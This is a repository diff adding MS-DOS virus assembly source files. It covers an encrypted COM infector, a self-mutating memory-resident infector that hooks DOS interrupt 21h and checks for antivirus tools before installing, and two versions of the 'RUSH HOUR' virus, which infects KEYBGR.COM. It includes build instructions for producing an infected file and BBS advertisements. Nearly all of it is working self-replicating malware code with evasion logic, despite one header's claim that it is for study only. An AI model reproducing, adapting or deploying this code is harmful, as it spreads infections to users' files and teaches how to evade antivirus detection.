Xor Al,Dl ; decryptor
Stosb ;
Loop Encrypt ;
Mov Ah,40h ; Write the virus
Lea Dx,0fd00h ; at the end of the
Mov Cx,VirLen ; file
Int 21h ;
Mov Ax,4200h ; Move to start of
Call FSeek ; the file
Mov Ah,40h ; Write the jump to the virus
Lea Dx,CallPtr[BP] ; at the begin of the file
Mov Cx,4 ;
Int 21h ;
Call Close ; Close the file
Ready: Mov Ah,1ah ; Restore the DTA to the
Mov Dx,80h ; original offset
Int 21h ;
Pop Ax ; Get (possible) error code
Mov Bx,100h ; Strange jump (but nice) to
Push Cs ; the begin of the program
Push Bx ; (which has been restored)
Retf ;
Close: Pop Si ; A pop which is stupid
Pop Dx ; Restore files date/time
Pop Cx ; stamp
Mov Ax,5701h ;
Int 21h ;
Mov Ah,3eh ; Close file
Int 21h ;
Mov Ax,4301h ; Restore attributes
Pop Cx ;
Mov Dx,0fc1eh ;
Int 21h ;
Push Si ; A push which is stupid
Ret ; Return to caller
CallPtr Db 0e9h,0,0 ; Jump
FileSpec Db '*.COM',0 ; Filesearch spec & signature
; Activation message
Msg Db 13,10,9,9,'RTL4'
Db 13,10,'Joop van den Ende Produkties BV'
Db 13,10,'Marco Daas (Casting Assistent)'
Db 13,10,'Postbus 397'
Db 13,10,'1430 AJ AALSMEER'
Db 13,10,'van Cleeffkade 15'
Db 13,10,'1413 BA AALSMEER'
Db 13,10,'The Netherlands'
Db 13,10,10,'Wedden dat... je een virus hebt?'
Db 13,10,'$'
; First 4 bytes of the host program
OrgPrg: Int 20h
DB 'GB' ; My initials (Glenn Benton)
CryptLen Equ $-Crypt ; Length of encrypted part
VirLen Equ $-MainVir ; Length of virus
;
; Sleep well, sleep in hell...
;
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> and Remember Don't Forget to Call <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄ> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <ÄÄÄÄÄÄÄÄÄÄ
; ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ
MSDOS/R-Index/Virus.MSDOS.Unknown.rtm.asm
+543
View File
@@ -0,0 +1,543 @@
ORG 0100H ; ..
Virii label Near ; Start adress CS:0100H
;
Mutate Proc Near ; The Decryption/encryption code begin here ..
Cmp Ax,01100H ;
J_N_E: ; Adress of the byte to change
JA ByeBye ; Will change for an 'JNE'
ExitFromINT21: ;
TTT: ;
ThePush: ;
Push Si ;
TheMov: ;
Lea Si,TheBody ;
Work: ;
theXor: ;
DB 02EH,081H,034H ; XOR W[Cs:Bx], ..
Mask Dw 0 ; Decryption/Encryption Key
TheAdd: ;
Add Si,2; ;
TheCmp: ;
Cmp Si,ViriiEnd-3 ;
Jb Thexor ;
ThePop: ;
Pop Si ;
; ;
Cmp B[Cs:FromTheHandler],1 ; The handler is calling?
Jne TheBody ; No
;
ExitWithREt: ;
Mov B[Cs:FromTheHandler],0 ;
PopA ;
ByeBye: ;
DB 0EAH ; Jmp Far
OLDINT21 DD 0 ;
; ;
FromTheHandler DB 0 ; Set to 1 if INT 21h handler call
; ;
Mutate EndP ; End of the procedure
TheBody Proc Near ; This Part is encrypted With the key "Mask"
PushA ; 286 & +
Call ChangeDecryptor ;
Cmp B[Cs:InTSR],1 ; Is it an INT 21h Call ?
Jne installit ;
Jmp Near INT21handler ; Yes .. jump to the handler
installit: ; Virus installation is done here
Mov B[inTSR],1 ; Indicate that the virus is in service
Mov B[J_N_E],072H ; 'JNE'
;;;;;;;;
Mov Ax,Cs ; ----- Reserve memory Block
Dec Ax ; Point to the MCB
Mov Ds,Ax ;
Mov Cx,W[Ds:3] ; Read the Size of the memory block
Sub Cx,VirSize2 + 20 ; Memory occuped by the Virus
Mov Bx,Cx ;
Mov Ah,04Ah ;
int 021H ;
Mov Bx,-1 ;
Mov Ah,048H ;
Int 021H ;
Mov Ah,048H ;
Int 021H ;
Dec Ax ;
Mov Ds,Ax ;
Mov W[1],0008 ; Set it as DOS SYSTEM AREA (heheheh)..
;;;;;;;;;; ;
Inc Ax ;
Mov Es,Ax ; Destination Seg:Off
Mov Di,0100H ; ES:DI ==> destination
Push Cs ; Source Seg:Off
Pop Ds ; Set Ds to the current segment
Lea SI,virii ; DS:SI ==> source
Mov Cx,VirLength ;
Cld ;
Repz ;
Movsb ;
Mov W[Es:Mask],0 ;
;;;;;;;;; ;
Cli ;
Mov Ds,Cx ; Ds to 0
Mov Ax,W[Ds:084H] ; Offset of the handler
Mov W[Es:Oldint21],AX ;
Mov Bx,W[Ds:086H] ; Segment of the Handler
Mov W[Es:OldInt21+2],Bx ;
Sti ;
Push Es ;
Push Di ;
Push Si ;
Call MemoryVerifier ;
Pop Si ;
Pop Di ;
Pop Es ;
Jc AnotherDayMaybe ;
;;;;;;;;; ;
;
Cli ;
Mov W[0413H],Ax ; Set Int 21 handler
Mov Ax,0100H ;
Mov W[0084H],Ax ;
Mov Ax,Es ;
Mov W[0086h],Ax ;
Sti ;
Jmp Ok ;
;;;;;;;;;;;;;;; ; The handler is now installed
; We have to Jump Far Far ..
AnotherDayMaybe:
Mov Ah,049H
Int 021H
Ok:
; And Encrypt It with a new Key
; Jump To The virus In mem
Push Cs ; Save CS twice for later Uses
Push Cs ; Do not forget : CS represents the segment
; Of the previously infected application !
;
Push Es ;
Push JumpTHere ; Store offset and segment on the Stack
RetF ; & jump
;---- This part run in "memory"
JumpTHere: ;
DecryptEndOfFile: ; Decrypt original application code
Pop ES ; ES & DS set to the PSP segment
Pop Ds ;
Mov Di,Cs:[FileSize] ; Destination
Add Di,0100H ; PSP Size (256 bytes)
Mov Si,Di ; Source
Push Si ;
;Mov Cx,VirLength ;
;Mov Dl,B[Cs:LocalKey] ; Local File Decryption Key
;Here2: ;
;LodsB ;
;Xor Al,Dl ;
;StosB ;
;Loop Here2 ; Decrypt the File
;
CopyEndOfFile: ; Now Copy The original code
Mov Cx,VirLength ;
Pop Si ;
Mov Di,0100H ; To the begining
Cld ;
Repz Movsb ; & Blit
; The Job of the virus launcher is finished
; We can now execute the infected file ..
;RESTORE REGISTERS
Mov W[Cs:Mask],0 ; we are not encrypted in the moment
PopA
Push es
Push 0100H
RetF
;****************************** ÉÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍ»
;****************************** º Features: º
;** Decryptor Mutator ** º 1 .3 different encryptor/decryptor º
;** By X ** º 2 .Automatic size checking º
;** 15-3-93 ** º 3 .Expansion possibilities º
;****************************** º 4 .The smollest code º
;****************************** ÈÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍÍͼ
ChangeDecryptor Proc Near
Push Ax
Push Bx
Mov Al,5
Mov Bl,B[Cs:ThePush]
Cmp Bl,053h
Je BxIsTheRegister
Cmp Bl,057H
Jne SiIsTheregister
Mov Al,4
Jmp MutateTheCode3
SiIsTheRegister:
Mov Al,1
BxIsTheRegister:
MutateTheCode3:
Xor B[Cs:ThePush],Al ; Switch To SI register
Xor B[Cs:ThePop],Al ; //
Xor B[Cs:TheMov],Al ;
Xor B[Cs:TheAdd+1],Al ;
Xor B[Cs:TheCmp+1],Al ;
Cmp Al,1 ;
Je MutationDone ;
Sub Al,2 ;
MutationDone: ;
Xor B[Cs:TheXor+2],Al ;
Pop Bx
Pop Ax
RET
;FVBM proc near ; First five bytes mutator
;PushA
;Lea Si,CodeTable ; Offset of our table
;Push Cs ;
;Push Cs ;
;Pop Ds ;
;Pop Es ;
;Add Si,B[Cs:pointer] ;
;Mov Cx,0005 ; Copy 5 bytes
;Cld ;
;RepZ MovSB ; Blit
;Add B[Cs:pointer],5 ;
;Cmp B[Cs:pointer],25 ; are we at the end of the table
;Jne Allright1 ;
;Mov B[Cs:pointer],0 ;
;Allright1: ;
;Mov Ax,02CH ; Input from the timer
;int 021H ;
;Xor Dh,Dl ;
;Mov B[Cs:Mutate+1],Ch ;
;Xor Dl,Cl ;
;Mov B[Cs:Mutate+3],Dl ;
;PopA ;
;Ret ; return to the caller
;CodeTable: ;
One1 : Mov Ah,0 ;
;; Sub Al,0 ;
; Nop ;
; ;
;Two2 : mov Ch,0 ;
; add Bl,0 ;
; Cld ;
; ;
;Three3: adc Cl,0 ;
; sub Ch,0 ;
; Stc ;
;
;Four4 : Mov Bh,0
; Mov Cl,0
; Nop
;
;CodeTableEnd:
;Pointer Db 0 ;
;
;
;******************************
;******************************
;** Resident part **
;** By X **
;******************************
;******************************
HideINT21H Proc Near ;
PopA ;
Mov Bx,W[Cs:OLDint21] ;
Mov Es,Bx ;
Mov Bx,W[Cs:Oldint21+2] ;
Iret ;
;
INT21Handler proc ;
Cmp Ax,04B00H ;
Je Exec ;
;Cmp Ax,03521H ;
;Jne NoHide ;
;Call HideINT21H ;
;NoHide: ;
;Cmp Ax,02521H ;
;Jne Nothinginterresting ;
;Call SimulateINT21H ;
Nothinginterresting: ;
Mov B[Cs:FromTheHandler],1 ;
Jmp ExitFromINT21 ;
Read: ;
Exec: ;
Mov Ax,03D02H ;
Int 021H ;
Jnc OpenSuccess ; Good ..
Jmp OpenFailed ; This operation Failed ..
OpenSuccess: ;
Mov W[Cs:Handle],Ax ;
Mov Si,Dx ; VeriFy if the file has a .COM extension
HereX: ;
Lodsb ;
Cmp al,'.' ; Searh for the Dot
Jne HereX ;
Dec Si ;
Dec Si ;
Dec Si ;
LodsW ;
Or Ax,02020H ;
Cmp Ax,'dn' ; Test For command.com
Jne NotCommand ;
Jmp ExitSimple ;
NotCommand: ;
Lodsb ;
Lodsb ;
Or Al,20H ; .
Cmp Al,'c' ; C
Je ContinueX ;
Jmp ExitSimple ;
ContinueX: ;
LodsW ;
Or Ax,02020H ; O
Cmp Ax,'mo' ; M
Je ComType ;
Jmp ExitSimple ;
ComType: ; Now for Command.COM
;;;;;;;;; ;
Push Ds ;
Push Dx ;
Mov Al,2 ; To the end
Call Seek0 ;
Pop Dx ;
Pop Ds ;
;;;;;;;;; ;
Push Ax ;
Push Cx ;
Push Dx ;
Mov Ah,02CH ;
Int 021H ;
Mov Cx,Ax ;
Xor Cx,Dx ;
Mov W[Cs:Mask],Cx ; Use file size as mutation key
Pop Dx ;
Pop Cx ;
Pop Ax ;
Mov W[Cs:FileSize],Ax ; Save File Size for the Mutation heritant
Cmp Ax,Virlength ; The file is too small?
Jnb NotSmall ;
Jmp ExitSimple ; Nop !
NotSmall: ;
Cmp Ax,64000 ; The file is too big?
Jna NotBig ;
Jmp ExitSimple ; No No
NotBig:
;;;;;;;;;
Mov Ax,04300H ;
Int 021H ;
Mov W[Cs:OldAttr],Cx ; Okey .. we have all we need
;;;;;;;;;
Mov Bx,W[Cs:Handle]
Mov Ax,04301H
Xor Cx,Cx
Int 021H
;;;;;;;;;
Push Ds ; Save For later uses (attributes)
Push Dx ;
;;;;;;;;;
Mov Ax,05700H ;
Int 021H ;
Mov W[Cs:OldTime],Cx ; Save File Time
Mov W[Cs:OldDate],Dx ; Save File date
And Cx,01FH ; Several viruses use this indicator (second=62)
Cmp Cx,01FH ;
Jne NotInfected
Jmp CloseAndExit ; Infected .. leave it alone .
NotInfected:
;;;;;;;;; ;
Xor Ax,Ax ; Seek to the Begining of the file (AL=0)
Call Seek0 ;
;;;;;;;;; ;
InfectTheFile: ; I love this part !
Mov Bx,W[Cs:Handle] ;
Mov Ah,03FH ; Read The Top of the File
Push Cs ;
Pop Ds ; To The buffer ..
Lea Dx,ViriiEnd ; The buffer is located at the end of the virus
Mov Cx,Virlength ; Number of bytes to read
Int 021H ; (ViriiEnd = virlength+0100h)
Jnc Continue6 ;
Jmp CloseAndExit ; Something is going wrong
Continue6: ;
;;;;;;;;; ;
Mov Al,2 ; Seek To the end
Call Seek0 ;
;;;;;;;;; ; Encrypt the Code
Mov Bx,W[Cs:Mask] ; get the virus Mask
Mov Ah,02CH ; Get a random Value
Int 021H ; From the timer
Xor Bx,Dx ; Good Good ...
Mov B[Cs:LocalKey],Bl ; Use This as The original code encryptor
Mov Dl,Bl
;;;;;;;;; ;
;Mov Cx,Virlength ; Encrypte the original code to make it harder
;Lea Bx,ViriiEnd ; to detect by virus scanners.
;Here4: ;
;Xor B[Cs:Bx],Dl ;
;Inc Bx ;
;Loop Here4 ;
;;;;;;;;; ;
Lea Dx,ViriiEnd ;
Push Cs ;
Pop Ds ;
Mov Bx,W[Cs:Handle] ;
Mov Cx,Virlength ;
Mov Ah,040H ; Write the code to the end
Int 021H ;
Jc CloseAndExit ; Bad ..
;;;;;;;;; ;
Xor Ax,Ax ;
Call Seek0 ; Seek to the begining of the file
;;;;;;;;; ; Copy The viral code to the peace of code
; we read
Mov B[Cs:J_N_E],077H ;
Mov B[Cs:InTSR],0 ;
Push Cs ;
Push Cs ;
Pop Ds ;
Pop Es ;
Lea Si,Mutate ; First We Blit The Mutation Engine
Lea Di,ViriiEnd ;
Mov Cx,MutatorSize ;
Cld
Repz MovsB ;
Mov Cx,BodySize2 ; And blit the body after some mutations
Mov Bx,W[Cs:Mask] ; Mouahahahah ...
Here5: ;
LodsW ;
Xor Ax,Bx ;
StosW ;
Loop Here5 ;
;;;;;;;;; ;
Mov B[Cs:J_N_E],072H ;
Mov B[Cs:InTSR],1 ; And restore the TSR Flag
Push Cs ;
Pop Ds ;
Mov Dx,offset ViriiEnd ;
Mov Bx,W[Cs:Handle] ;
Mov Cx,Virlength ;
Mov Ah,040H ; Write The Virus
Int 021H ;
; ;
CloseAndExit: ;
Mov Bx,W[Cs:Handle] ;
Mov Ax,05701H ;
Mov Cx,W[Cs:OldTime] ; Set File Time
Mov Dx,W[Cs:OldDate] ; Set File date
Int 021H ;
;
Pop Dx ;
Pop Ds ;
Mov Ax,04301H ;
Mov Cx,W[Cs:OldAttr] ; Okey .. we have all we need
Int 021H ;
ExitSimple: ;
Mov Bx,W[Cs:Handle] ;
Mov Ah,03EH ; Close The File
Int 021H ;
OpenFailed: ;
Mov B[Cs:FromTheHandler],1 ; This is the handler
Jmp ExitFromInt21 ; Give me another monstreous mutation !
;
Seek0: ;
Xor Cx,Cx ;
Seek: ;
Mov Ah,042H ; Seek to the end or to the begining of the file
Xor Dx,Dx ; Xor Dx,dx
Mov Bx,W[CS:Handle] ;
Int 021H ;
Ret ;
;******************************
;******************************
;** Memory Verifier **
;** By X **
;** 18-03-1993 **
;******************************
;******************************
MemoryVerifier Proc Near
Stc ; Set the carry Flag
Cmp Ax,0100H ; The Virus is installed At ????H:0100H
Je NoWay ; Do not take the risk
Cmp Ax,0362H ; VirStop is installed (Fprot) ..nonono
Je NoWay ;
;
Mov Ax,0FA00H ; Test for vsafe (Central Point) ..nonono
Xor Di,Di ;
Mov Dx,05945H ;
Int 013H ;
Cmp Di,04559H ;
Je NoWay ;
;
Mov Ax,0FF0FH ;
Int 021H ; VirexPc/Flushot INSTALLATION CHECK
Cmp Ax,101H ;
Je NoWay ; Never , never , never !
;
Mov Ax,04B4DH ; Murphy 2 INSTALLATION CHECK
Int 021H
jnc NoWay ; Nah !
;
Mov Ax,04B59H ; Murphy 1 INSTALLATION CHECK
Int 021H ;
Jnc NoWay ; Murphy 1 is resident
;
Mov Ax,04BFFH ; CASCADE,Justice & 707 INSTALLATION CHECK
Xor Si,Si ; Si&Di to zero for CASCADE
Xor Di,Di ;
Int 021H
Cmp Bl,0FFH
Je NoWay ; 707 is resident
;
Cmp Di,055AAH
Je NoWay ; Cascade or justice is resident
;
Mov Ax,0357FH ; AgiPlan INSTALLATION CHECK
Int 021H
Cmp Dx,0FFFFH ;
Je NoWay ; AgiPlan is installed
;
Mov Ax,04243H ; Invader INSATLLATION CHACK
Int 021H
Cmp Ax,05678H
Je NoWay ; Invader is resident
;
Clc ; Okey ..
Jmp return
Noway:
Stc
return:
Ret
MemoryVerifier EndP
DatasArea: ; For Datas storage.
SizeOfTheHole DW 0
FileSize DW FileLength ; The size of the infected File
inTSR DB 0
LocalKey DB 0
Victim_Releated_Datas:
Handle DW 0
OldAttr DW 0
OldTime DW 0
OldDate DW 0
ViriiEnd:
;Constante
VirLength EQU (ViriiEnd-Virii)
VirSize2 EQU (Virlength/16) * 2
VirSize4 EQU VirSize2 * 2
VirLength2 EQU Virlength/2
MutatorSize EQU TheBody-Mutate
BodySize EQU ViriiEnd-TheBody
BoDySize2 EQU BoDySize/2
TheCenter:
Db 300 dup (0)
TheCodePart:
Db (Virlength-5) dup (90h)
Mov Ax,04C00h
Int 021H
EndOfFile:
FileLength equ TheCodePart-virii
MSDOS/R-Index/Virus.MSDOS.Unknown.rush_vir.asm
+242
View File
@@ -0,0 +1,242 @@
;****************************************************************************;
; ;
; -=][][][][][][][][][][][][][][][=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] [=- ;
; -=] For All Your H/P/A/V Files [=- ;
; -=] SysOp: Peter Venkman [=- ;
; -=] [=- ;
; -=] +31.(o)79.426o79 [=- ;
; -=] P E R F E C T C R I M E [=- ;
; -=][][][][][][][][][][][][][][][=- ;
; ;
; *** NOT FOR GENERAL DISTRIBUTION *** ;
; ;
; This File is for the Purpose of Virus Study Only! It Should not be Passed ;
; Around Among the General Public. It Will be Very Useful for Learning how ;
; Viruses Work and Propagate. But Anybody With Access to an Assembler can ;
; Turn it Into a Working Virus and Anybody With a bit of Assembly Coding ;
; Experience can Turn it Into a far More Malevolent Program Than it Already ;
; Is. Keep This Code in Responsible Hands! ;
; ;
;****************************************************************************;
page 72,132
title Virus"RUSH HOUR" (c) Hanx ,1992
name VIRUS
abso segment at 0
org 4*10h
video_int dw 2 dup (?)
org 4*21h
dos_int dw 2 dup (?)
org 4*24h
error_int dw 2 dup (?)
abso ends
code segment
assume cs:code, ds:code, es:code
org 05ch
fcb label byte
drive db ?
fspec db 11 dup (' ')
org 6ch
fsize dw 2 dup (?)
fdate dw ?
ftime dw ?
org 80h
dta dw 128 dup (?)
org 071eh
xor ax,ax
mov es,ax
assume es:abso
push cs
pop ds
mov ax,video_int
mov bx,video_int+2
mov word ptr video_vector,ax
mov word ptr video_vector+2,bx
mov ax,dos_int
mov bx,dos_int+2
mov word ptr dos_vector,ax
mov word ptr dos_vector+2,bx
cli
mov dos_int,offset virus
mov dos_int+2,cs
mov video_int,offset disease
mov video_int+2,cs
sti
mov ah,0
int 1ah
mov time_0,dx
lea dx,virus_einde
int 27h
video_vector dd (?)
dos_vector dd (?)
error_vector dw 2 dup (?)
time_0 dw ?
rndval db 'bfhg'
active db 0
preset db 0
db 'A:'
fname db 'KEYBGR COM'
db 0
virus proc far
assume cs:code, ds:nothing, es:nothing
push ax
push cx
push dx
mov ah,0
INT 1AH
SUB DX,TIME_0
CMP DX,16384
JL $3
MOV ACTIVE,1
$3: pop dx
pop cx
pop ax
cmp ax,4b00h
je $1
exit_1: jmp dos_vector
$1: push es
push bx
push ds
push dx
mov di,dx
mov drive,0
mov al,ds:[di+1]
cmp al,':'
jne $5
mov al,ds:[di]
sub al,'A'-1
mov drive,al
$5: cld
push cs
pop ds
xor ax,ax
mov es,ax
assume ds:code, es:abso
mov ax,error_int
mov bx,error_int+2
mov error_vector,ax
mov error_vector+2,bx
mov error_int,offset error
mov error_int+2,cs
push cs
pop es
assume es:code
lea dx,dta
mov ah,1ah
int 21h
mov bx,11
$2: mov al,fname-1[bx]
mov fspec-1[bx],al
dec bx
jnz $2
lea dx,fcb
mov ah,0fh
int 21h
cmp al,0
jne exit_0
mov byte ptr fcb+20h,0
mov ax,ftime
cmp ax,4800h
je exit_0
mov preset,1
mov si,100h
$4: lea di,dta
mov cx,128
rep movsb
lea dx,fcb
mov ah,15h
int 21h
cmp si,offset virus_einde
jl $4
mov fsize,offset virus_einde -100h
mov fsize+2,0
mov fdate,0AA3h
mov ftime,4800h
lea dx,fcb
mov ah,10h
int 21h
xor ax,ax
mov es,ax
assume es:abso
mov ax,error_vector
mov bx,error_vector+2
mov error_int,ax
mov error_int+2,bx
exit_0: pop dx
pop ds
pop bx
pop es
assume ds:nothing, es:nothing
mov ax,4b00h
jmp dos_vector
virus endp
error proc far
iret
error endp
disease proc far
assume ds:nothing, es:nothing
push ax
push cx
test preset,1
jz exit_2
test active,1
jz exit_2
in al,61h
and al,0feh
out 61h,al
mov cx,3
noise: mov al,rndval
xor al,rndval+3
shl al,1
shl al,1
rcl word ptr rndval,1
rcl word ptr rndval+2,1
mov ah,rndval
and ah,2
in al,61h
and al,0fdh
or al,ah
out 61h,al
loop noise
and al,0fch
or al,1
out 61h,al
exit_2: pop cx
pop ax
jmp video_vector
disease endp
db 'Dit is een demonstratie van een zogenaamd computervirus.'
db 'Het heeft volledige controle over alle systeem-componenten'
db 'en alle harde schijven en in de drive(s) ingevoerde'
db 'diskettes. Het programma kopieert zichzelf naar andere,'
db 'nog niet besmette besturingssystemen en verspreidt zich op'
db 'die manier ongecontroleerd. In dit geval zijn er geen'
db 'programma`s beschadigd of schijven gewist, omdat dit'
db 'slechts een demonstratie is. Een kwaadaardig virus'
db 'had echter wel degelijk schade aan kunnen richten.'
org 1c2ah
virus_einde label byte
code ends
end

;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ;
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ> and Remember Don't Forget to Call <ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ;
;ÄÄÄÄÄÄÄÄÄÄÄÄ> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <ÄÄÄÄÄÄÄÄÄÄ;
;ÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄÄ;
MSDOS/R-Index/Virus.MSDOS.Unknown.rushhour.asm
+323
View File
@@ -0,0 +1,323 @@
PAGE 72,132
TITLE Virus "RUSH HOUR" (p) Foxi, 1986
NAME VIRUS
ABS0 SEGMENT AT 0
ORG 4*10H
VIDEO_INT DW 2 DUP (?) ; VIDEO INTERRUPT
; VECTOR
ORG 4*21H
DOS_INT DW 2 DUP (?) ; DOS -"-
ORG 4*24H
ERROR_INT DW 2 DUP (?) ; ERROR -"-
ABS0 ENDS
CODE SEGMENT
ASSUME CS:CODE, DS:CODE, ES:CODE
ORG 05CH
FCB LABEL BYTE
DRIVE DB ?
FSPEC DB 11 DUP (' ') ; Filename
ORG 6CH
FSIZE DW 2 DUP (?)
FDATE DW ? ; date of last
; modification
FTIME DW ? ; time -"- -"-
ORG 80H
DTA DW 128 DUP (?) ; Disk Transfer Area
ORG 071EH ; end of the normal
; KEYBGR.COM
XOR AX,AX
MOV ES,AX ; ES points to ABS0
ASSUME ES:ABS0
PUSH CS
POP DS
MOV AX,VIDEO_INT ; store old
; interrupt vectors
MOV BX,VIDEO_INT+2
MOV word ptr VIDEO_VECTOR,AX
MOV word ptr VIDEO_VECTOR+2,BX
MOV AX,DOS_INT
MOV BX,DOS_INT+2
MOV word ptr DOS_VECTOR,AX
MOV word ptr DOS_VECTOR+2,BX
CLI
MOV DOS_INT,OFFSET VIRUS ; new DOS vector
; points to
; VIRUS
MOV DOS_INT+2,CS
MOV VIDEO_INT,OFFSET DISEASE ; video vector
; points to DISEASE
MOV VIDEO_INT+2,CS
STI
MOV AH,0
INT 1AH ; read TimeOfDay (TOD)
MOV TIME_0,DX
LEA DX,VIRUS_ENDE
INT 27H ; terminate program
; remain resident.
VIDEO_VECTOR Dd (?)
DOS_VECTOR Dd (?)
ERROR_VECTOR DW 2 DUP (?)
TIME_0 DW ?
;
; VIRUS main program:
;
; 1. System call AH=4BH ?
; No : --> 2.
; Yes : Test KEYBGR.COM on specified drive
; Already infected?
; Yes : --> 3.
; No : INFECTION !
;
; 2. Jump to normal DOS
;
RNDVAL DB 'bfhg'
ACTIVE DB 0 ; not active
PRESET DB 0 ; first virus not
; active!
DB 'A:'
FNAME DB 'KEYBGR COM'
DB 0
VIRUS PROC FAR
ASSUME CS:CODE, DS:NOTHING, ES:NOTHING
PUSH AX
PUSH CX
PUSH DX
MOV AH,0 ; check if at least 15
; min.
INT 1AH ; have elapsed
; since
SUB DX,TIME_0 ; installation.
CMP DX,16384 ; (16384 ticks of the
; clock=15 min.)
JL $3
MOV ACTIVE,1 ; if so, activate
; virus.
$3: POP DX
POP CX
POP AX
; disk access
; because of the
CMP AX,4B00H ; DOS command
JE $1 ; "Load and execute
; program" ?
EXIT_1:
JMP DOS_VECTOR ; No : --> continue as normal
$1: PUSH ES ; ES:BX -->
; parameter block
PUSH BX ; DS:DX --> filename
PUSH DS ; save registers which
; will be needed
PUSH DX ; for INT 21H
; (AH=4BH)
MOV DI,DX
MOV DRIVE,0 ; Set the drive
; of the
MOV AL,DS:[DI+1] ; program to be
; executed
CMP AL,':'
JNE $5
MOV AL,DS:[DI]
SUB AL,'A'-1
MOV DRIVE,AL
$5: CLD
PUSH CS
POP DS
XOR AX,AX
MOV ES,AX
ASSUME DS:CODE, ES:ABS0
MOV AX,ERROR_INT ; Ignore all
; disk "errors"
MOV BX,ERROR_INT+2 ; with our own
; error routine
MOV ERROR_VECTOR,AX
MOV ERROR_VECTOR+2,BX
MOV ERROR_INT,OFFSET ERROR
MOV ERROR_INT+2,CS
PUSH CS
POP ES
ASSUME ES:CODE
LEA DX,DTA ; Disk Transfer Area
; select
MOV AH,1AH
INT 21H
MOV BX,11 ; transfer the
; filename
$2:
MOV AL,FNAME-1[BX] ; into FileControlBlock
MOV FSPEC-1[BX],AL
DEC BX
JNZ $2
LEA DX,FCB ; open file ( for
; writing )
MOV AH,0FH
INT 21H
CMP AL,0
JNE EXIT_0 ; file does not exist -
; -> end
MOV byte ptr fcb+20h,0 ;
MOV AX,FTIME ; file already infected ?
CMP AX,4800H
JE EXIT_0 ; YES --> END
MOV PRESET,1 ; (All copies are
; virulent !)
MOV SI,100H ; write the VIRUS in
; the file
$4:
LEA DI,DTA
MOV CX,128
REP MOVSB
LEA DX,FCB
MOV AH,15H
INT 21H
CMP SI,OFFSET VIRUS_ENDE
JL $4
MOV FSIZE,OFFSET VIRUS_ENDE - 100H
MOV FSIZE+2,0 ; set correct
; file size
MOV FDATE,0AA3H ; set correct date
; (03-05-86)
MOV FTIME,4800H ; -"- time
; (09:00:00)
LEA DX,FCB ; close file
MOV AH,10H
INT 21H
XOR AX,AX
MOV ES,AX
ASSUME ES:ABS0
MOV AX,ERROR_VECTOR ; reset the error
; interrupt
MOV BX,ERROR_VECTOR+2
MOV ERROR_INT,AX
MOV ERROR_INT+2,BX
EXIT_0:
POP DX ; restore the saved
; registers
POP DS
POP BX
POP ES
ASSUME DS:NOTHING, ES:NOTHING
MOV AX,4B00H
JMP DOS_VECTOR ; normal function execution
VIRUS ENDP
ERROR PROC FAR
IRET ; simply ignore all
; errors...
ERROR ENDP
DISEASE PROC FAR
ASSUME DS:NOTHING, ES:NOTHING
PUSH AX ; These registers will be
; destroyed!
TEST PRESET,1
JZ EXIT_2
TEST ACTIVE,1
JZ EXIT_2
IN AL,61H ; Enable speaker
AND AL,0FEH ; ( Bit 0 := 0 )
OUT 61H,AL
MOV CX,3 ; index loop CX
NOISE:
MOV AL,RNDVAL ; :
XOR AL,RNDVAL+3 ; :
SHL AL,1 ; generate NOISE
SHL AL,1 ; :
RCL WORD PTR RNDVAL,1 ; :
RCL WORD PTR RNDVAL+2,1 ; :
MOV AH,RNDVAL ; output some bit
AND AH,2 ; of the feedback
IN AL,61H ; shift register
AND AL,0FDH ; --> noise from speaker
OR AL,AH
OUT 61H,AL
EXIT_2:
POP CX
POP AX
JMP VIDEO_VECTOR ; jump to the normal
; VIDEO routine.....
DISEASE ENDP
DB 'This program is a VIRUS program.'
DB 'Once activated it has control over all'
DB 'system devices and even over all storage'
DB 'media inserted by the user. It continually'
DB 'copies itself into uninfected operating'
DB 'systems and thus spreads uncontrolled.'
DB 'The fact that the virus does not destroy any'
DB 'user programs or erase the disk is merely due'
DB 'to a philanthropic trait of the author......'
ORG 1C2AH
VIRUS_ENDE LABEL BYTE
CODE ENDS
END
; To get an executable program:
;
; 1.) Assemble and link source
; 2.) Rename EXE file to COM!
; 3.) Load renamed EXE file into DEBUG
; 4.) Reduce register CX to 300H
; 5.) Write COM file to disk with "w"
; 6.) Load COM file virus in DEBUG
; 7.) Load KEYBGR.COM
; 8.) Change addresses 71Eh ff. as follows:
; 71EH: 33 C0 8E C0 0E 1F 26
; 9.) Write KEYBGR.COM to disk with a length of 1B2A bytes
;
; Source code RUSHHOUR.ASM -- (C) 1986, foxi
;
; Taken from book "Computer Viruses - a high-tech disease"
;
; Source retyped by -=> CyberZone <=- Jon A Johnson
